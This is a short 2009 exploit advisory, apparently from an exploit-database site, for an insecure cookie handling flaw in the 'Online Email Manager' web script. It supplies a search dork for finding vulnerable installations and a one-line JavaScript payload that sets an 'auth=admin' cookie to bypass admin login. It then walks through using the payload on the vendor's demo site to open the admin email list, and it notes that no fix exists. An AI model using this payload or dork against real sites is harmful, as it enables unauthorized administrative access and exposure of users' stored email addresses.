Online Email Manager Insecure Cookie Handling Vulnerability

2009-04-17 22:32:50




{____________________________________}
Author: Hussin X

Home : WwW.IQ-TY.CoM

email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_email_manager.phps

DorK : Powered by Online Email Manager



exploit:

javascript:document.cookie = "auth=admin; path=/";



exploit for demo

|# http://www.esoftpro.com/demo/OEM/admin/index.php

|ex javascript:document.cookie = "auth=admin; path=/";

|# go to url "emailList.php"

|# http://www.esoftpro.com/demo/OEM/admin/emailList.php

|# you login in to admin page :d






Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

#

Fixes

No fixes

In order to submit a new fix you need to be registered.